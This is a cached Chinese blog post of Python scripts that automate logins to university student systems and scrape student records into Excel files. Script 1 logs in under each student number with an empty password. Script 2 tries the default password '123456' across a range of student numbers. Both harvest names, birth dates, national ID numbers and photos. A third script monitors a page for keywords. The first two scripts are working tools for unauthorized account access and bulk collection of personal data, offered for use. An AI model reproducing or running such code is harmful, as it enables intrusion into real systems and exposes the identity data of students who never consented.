py读写Excel模拟登陆代理爬取
原文链接 http://code.lujq.me/2014/09/22/py%E8%AF%BB%E5%86%99Excel%E6%A8%A1%E6%8B%9F%E7%99%BB%E9%99%86%E4%BB%A3%E7%90%86%E7%88%AC%E5%8F%96/
注:以下为加速网络访问所做的原文缓存,经过重新格式化,可能存在格式方面的问题,或偶有遗漏信息,请以原文为准。
下列代码全部基于 Python 3.4,并依赖第三方库 xlrd 与 xlwt3。
<!--more-->
import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time,random
# Script 1, step 1: open the input workbook and decide where to resume.
#
# Column 0 of 'Sheet1' in read.xls holds the student numbers to look up.
# Results go to numbered files (0.xls, 1.xls, ...); every run writes a new
# file and continues after the last student number stored in the newest
# existing one.
print ("######## 确保关闭了所有的EXCEL,运行时不要打开任何EXCEL文件 ########")

rfile = xlrd.open_workbook('read.xls')
rsheet = rfile.sheet_by_name(u'Sheet1')

resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0  # index into the input column at which this run starts
if os.path.exists(result):
    # Advance to the first unused number, then step back to the newest
    # existing result file.
    while os.path.exists(result):
        resultfilenum += 1
        result = str(resultfilenum)+".xls"
    resultfilenum -= 1
    result = str(resultfilenum)+".xls"
    wfile = xlrd.open_workbook(result)
    wsheet = wfile.sheet_by_name(u'Sheet1')
    finished = wsheet.col_values(0)
    # A previous run may have saved a sheet without any row; in that case
    # there is nothing to resume from and the run starts at the top.
    if finished:
        lasttask = finished[-1]
        # Count input entries up to and including the last finished one.
        for schnum in rsheet.col_values(0):
            i += 1
            if schnum == lasttask :
                break
else :
    # Cancels the increment below so the first result file is 0.xls.
    resultfilenum -= 1

# Always write into a fresh workbook saved under the next unused number.
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
resultfilenum += 1
result = str(resultfilenum)+".xls"
# Script 1, step 2: HTTP plumbing and loop counters.

# Every urllib request goes through the local proxy and shares one cookie jar.
cookie = http.cookiejar.CookieJar()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
authinfo = urllib.request.HTTPBasicAuthHandler()
cookieProc = urllib.request.HTTPCookieProcessor(cookie)
opener = urllib.request.build_opener(proxy_support, authinfo, cookieProc)
urllib.request.install_opener(opener)

# Headers sent with the login POST.
headers = dict([
    ('User-Agent', 'IE 6.0'),
    ('Host', 'www.*******.***************'),
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
    ('Referer', 'http://www.*******.***************/login'),
    ('Cookie', 'JSESSIONID=8D46BD035D5B6AC1C443211A21245A27'),
    ('Connection', 'keep-alive'),
])

fail = k = namer = 0
print ("############### 程序初始化完成 ##########")
# Number of lookups after which the main loop stops; 0 never matches the
# 1-based counter, so the whole input list is processed.
stop = 0
# Script 1, step 3: log in once per student number, fetch the two profile
# pages, cut the fields out by string offsets and write one row per student.
# The workbook is saved after every student so an interrupted run can resume.
for schnum in rsheet.col_values(0)[i:]:
    k += 1
    postdata=urllib.parse.urlencode({
        "contextPath":'',
        'contextName':'*******LoginPage',
        'contextPara':'null',
        'sectionName':'login',
        'itemName':'loginAction',
        'controlType':'frame',
        'login_strLoginName':schnum,
        "login_strPassword":''
    }).encode(encoding='UTF8')
    # The POST payload for the server is ready.
    log = urllib.request.Request(
        url = 'http://www.*******.***************/bsuims/bsMainFrameInit.do?',
        data = postdata,
        headers = headers
    )
    login = urllib.request.urlopen(log).read().decode("utf-8")
    # The login POST has been sent; the two pages below are requested
    # through the same installed opener (and therefore the same cookie jar).
    info1 = urllib.request.Request(
        url = 'http://www.*******.***************/person/stuinfo_personInfoShow.do?personId=119937&admin=0&accessType=&visualType=1'
    )
    info1 = urllib.request.urlopen(info1).read().decode("utf-8")
    info2 = urllib.request.Request(
        url = 'http://www.*******.***************/person/stuinfo_stuTrainShow.do'
    )
    info2 = urllib.request.urlopen(info2).read().decode("utf-8")
    # A fixed 10-character slice of the first page is used to tell the
    # profile page, the "return to login" page and anything else apart.
    if info1[240:250] == 'tml; chars' :
        # order1[j] / order2[j]: position of the j-th '</td>' in each page.
        order1 = [0 for j in range(27)]
        order2 = [0 for j in range(27)]
        for j in range (1,27):
            order1[j] = info1.find('</td>',order1[j-1]+1)
            order2[j] = info2.find('</td>',order2[j-1]+1)
        name = info1[info1.find('<td width="25%">')+25:order1[3]-8]
        # Same name as the previous student: skip this entry without
        # writing, saving or advancing the output row.
        if (name == namer):
            print('与上一个相同')
            continue
        namer = name
        ename = info1[order1[4]+37:order1[5]-8].strip()
        photoid = info1[info1.find('personId=',order1[5])+9:info1.find('&photoType')]
        schoolnum = info1[info1.find('<td width="20%">')+25:order1[8]-8].strip()
        # Sanity check: the page must belong to the number we logged in with.
        if str(schoolnum) != str(schnum) :
            print("在第"+str(k)+"次执行时循环变量与中间检测结果不符!程序已经终止,检查一下错……")
            print("错误学号是:"+str(schnum),schoolnum)
            break
        if info1.find('女') > 0 :sex = '女'
        if info1.find('男') > 0 :sex = '男'
        nation = info1[info1.find('<td width="20%">',order1[15])+25:order1[16]-8]
        brith = info1[info1.find('<td height="25" width="35%">',order1[21])+37:order1[22]-8]
        idnum = info1[info1.find('<td>',order1[25])+13:order1[26]-8]
        admissionnum = info2[info2.find('<td width="28%">')+25:order2[3]-8]
        oversea = info2[info2.find('<td>',order2[6])+22:order2[7]-8]
        brave = info2[info2.find('<td>',order2[8])+22:order2[9]-8]
        college = info2[info2.find('<td>',order2[10])+13:order2[11]-8]
        major = info2[info2.find('<td>',order2[14])+13:order2[15]-8]
        clas = info2[info2.find('<td>',order2[18])+13:order2[19]-8]
        campus = info2[info2.find('<td>',order2[20])+13:order2[21]-8]
        degree = info2[info2.find('<td>',order2[22])+13:order2[23]-8]
        wsheet.write(i,0,schnum)
        wsheet.write(i,1,name)
        # Column 2 is left empty; writing `sex` there is disabled:
        # wsheet.write(i,2,sex)
        wsheet.write(i,3,brith)
        wsheet.write(i,4,college)
        wsheet.write(i,5,major)
        wsheet.write(i,6,clas)
        wsheet.write(i,7,campus)
        wsheet.write(i,8,degree)
        wsheet.write(i,9,idnum)
        wsheet.write(i,10,nation)
        wsheet.write(i,11,oversea)
        wsheet.write(i,12,brave)
        wsheet.write(i,13,admissionnum)
        wsheet.write(i,14,ename)
        # Photo URL and file name are prepared, but the download is disabled.
        imgurl="http://www.*******.***************/person/stuinfo_downloadPhoto.do?personId="+str(photoid)+"&photoType=02"
        # imgname=str(sex)+str(schnum)+str(name)+'.jpg'
        imgname= str(schnum)+str(name)+'.jpg'
        # urllib.request.urlretrieve(imgurl,imgname)
    elif info1[240:250] == 'eturnlogin':
        print('登录失败')
    else:
        # The message below tells the operator that the login response was
        # printed above it, so actually print it before stopping.
        print(login)
        print ("尝试登陆后得到的结果已经在上面打印,与预期不符,程序已经终止,检查错误吧")
        break
    # Checkpoint after every processed student.
    wfile.save(result)
    print ('第%d个已经完成'%(k))
    i += 1
    if k == stop :
        break
#wfile.save(result)
print ('############################## 任务执行完毕 ########################')
print ("本次任务文件保存为 : "+result)
import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time
def deal(info,i):
    """Extract one student record from ``info`` and store it in row ``i``.

    ``info`` is the decoded HTML of the record page. Field values are taken
    from the text that follows selected ``<p align="center">`` markers, up
    to the next ``<``. The student number found in the page is compared
    with the module-level ``schnum``; on a mismatch a notice is printed and
    nothing is written. Otherwise the row is written to the module-level
    ``wsheet`` and the workbook ``wfile`` is saved to ``result``.

    Raises ``ValueError`` if the 12 characters read as the student number
    are not an integer.
    """
    # o[j] is the index just past the j-th '<p align="center">' marker
    # (the marker is 18 characters long).
    o = [0 for j in range(61)]
    for j in range (1,61):
        o[j] = info.find('<p align="center">',o[j-1])+18

    def cell(n):
        # Text from just after the n-th marker up to the next tag.
        return info[o[n]:info.find('<',o[n])]

    imgurl = info[info.find('<p><img src=')+13:info.find('" ></p>')]
    schoolnum = info[o[2]:o[2]+12]
    if (int(schoolnum) != schnum):
        print(str(schnum)+' ++++不存在++++ '+schoolnum)
        return

    # Marker numbers of the fields, in output-column order (columns 1-12):
    # name, sex, birth, jiguan, mianmao, leibie, college, major, lang,
    # kaoqu, midsch, goal.
    markers = (4, 8, 10, 14, 16, 20, 22, 28, 30, 32, 34, 36)
    row = [schoolnum] + [cell(n) for n in markers] + [imgurl]
    print(schnum,row[1])
    for column, value in enumerate(row):
        wsheet.write(i,column,value)
    # Save after every record so an aborted run keeps what it has.
    wfile.save(result)
# Script 2, step 1: pick the output file and create an empty workbook.
#
# Result files are numbered 0.xls, 1.xls, ...; this run writes to the first
# number that does not exist yet. The previous result file is no longer
# re-opened here: nothing was read from it and the objects were replaced
# immediately by the new workbook below.
resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0  # next output row
k = 0  # count of "student number does not exist" answers
l = 0
while os.path.exists(result):
    resultfilenum += 1
    result = str(resultfilenum)+".xls"
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
# Script 2, step 2: route urllib through the local proxy with a shared
# cookie jar, and define the headers used for the login POST.
cookie = http.cookiejar.CookieJar()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
authinfo = urllib.request.HTTPBasicAuthHandler()
cookieProc = urllib.request.HTTPCookieProcessor(cookie)
opener = urllib.request.build_opener(proxy_support, authinfo, cookieProc)
urllib.request.install_opener(opener)

headers = dict([
    ('User-Agent', 'IE 6.0'),
    ('Host', '*********:7890'),
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
    ('Referer', 'http://*********:7890/zhxt_bks/xk_login.html'),
    ('Cookie', 'ACCOUNT=73654'),
    ('Connection', 'keep-alive'),
])
# Disabled alternative: take the student numbers from a workbook column
# instead of a numeric range.
#for schnum in rsheet.col_values(0)[i:]:
####################################################################
####################################################################
# NOTE: both values are redacted in the published source and must be filled
# in before running. They are formatted with %d and passed to
# range(start, end) below, so they have to be integers; `end` is exclusive.
start = ******************
end = ******************
####################################################################
####################################################################
# Script 2, step 3: try every student number in [start, end) with the fixed
# password, and store the record page of each successful login.
print ('程序初始化完成,将获取[%d]到[%d]的信息'%(start,end))
for schnum in range (start,end):
    postdata=urllib.parse.urlencode({
        'stuid':str(schnum),
        'pwd':'123456'
    }).encode(encoding='gbk')
    log = urllib.request.Request(
        url = 'http://*********:7890/pls/wwwbks/bks_login2.login',
        data = postdata,
        headers = headers
    )
    login = urllib.request.urlopen(log).read()
    # The login outcome is read from a separate status page.
    cheak = urllib.request.Request(
        url = 'http://*********:7890/pls/wwwbks/bks_login2.loginmessage'
    )
    cheak = urllib.request.urlopen(cheak).read().decode('gbk')
    if ('请先登录再使用!!!' in cheak):
        print(str(schnum)+' 失败')
    elif ('你输入了错误的学号或密码' in cheak):
        print(str(schnum)+' 不存在')
        k += 1
        if ( k == 20 ):
            print('连续20个不存在')
            break
    elif ('登录成功!' in cheak ):
        # The stop message above reports 20 *consecutive* misses, so a
        # successful login has to restart the count.
        k = 0
        info = urllib.request.Request(
            url = 'http://*********:7890/pls/wwwbks/bks_xj.xjcx'
        )
        info = urllib.request.urlopen(info).read().decode('gbk')
        # Only pages whose fixed 10-character slice matches are parsed.
        if (info[200:210] == 't language'):
            deal(info,i)
            i += 1
    else:
        # Unknown answer: show it and stop so the operator can investigate.
        print(cheak)
        print(str(schnum)+'检查看看这是怎么了。')
        break
print('文件保存为'+result)
监控关键词
import urllib.request,os,time
# Already-known hits that find() only echoes instead of raising an alert for:
# `al` lists URLs, `alt` lists titles.
al = ["http://*****************.html"]
alt = ["****************"]
def find(a):
    """Report the entry of the fetched page ``f`` that contains keyword ``a``.

    Works on the module-level page text ``f``. The title is the text between
    the nearest ``>`` before the keyword and the next ``<`` after it; the URL
    is rebuilt from the last ``data`` ... ``html`` span that precedes it.
    If the URL is listed in ``al`` or the title in ``alt``, only the title is
    printed. Otherwise title and URL are printed, a ``cmd`` shell is started
    through ``os.system`` and the function sleeps for 80 seconds.
    """
    hit = f.find(a)
    title_start = f[:hit].rfind(">")+1
    title_end = f.find("<",hit)
    title = f[title_start:title_end]
    path_start = f[:title_start].rfind("data")
    path_end = f[:hit].rfind("html")
    url = "http://******.com/htm_"+f[path_start:path_end]+"html"

    # Known entry: echo the title and do not raise an alert.
    if (url in al) or (title in alt):
        print(title)
        return

    print("标题:"+title)
    print(url)
    os.system('cmd')
    time.sleep(80)
# Script 3: poll one page forever and call find() for every keyword in it.
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo)
urllib.request.install_opener(opener)
li = ["关键词1","关键词2","关键词3"]
i = 0  # number of failed fetches so far
while 1 :
    # Retry until the page has been fetched and decoded.
    while 1:
        try:
            # Only the part from offset 14800 up to 2400 characters before
            # the end of the page is kept for searching.
            f = urllib.request.urlopen('http://**************************').read().decode("gbk")[14800:-2400]
            break
        except Exception:
            # `except Exception` instead of a bare `except` keeps Ctrl-C
            # (KeyboardInterrupt) able to stop the program.
            print("失败")
            i+=1
            # Open a cmd shell on every fifth failure. The former test
            # `i / 5 == 0` used true division and was never true for i >= 1.
            if (i % 5 == 0):
                os.system('cmd')
            time.sleep(150)
    for a in li:
        if (a in f):
            find(a)
    time.sleep(50)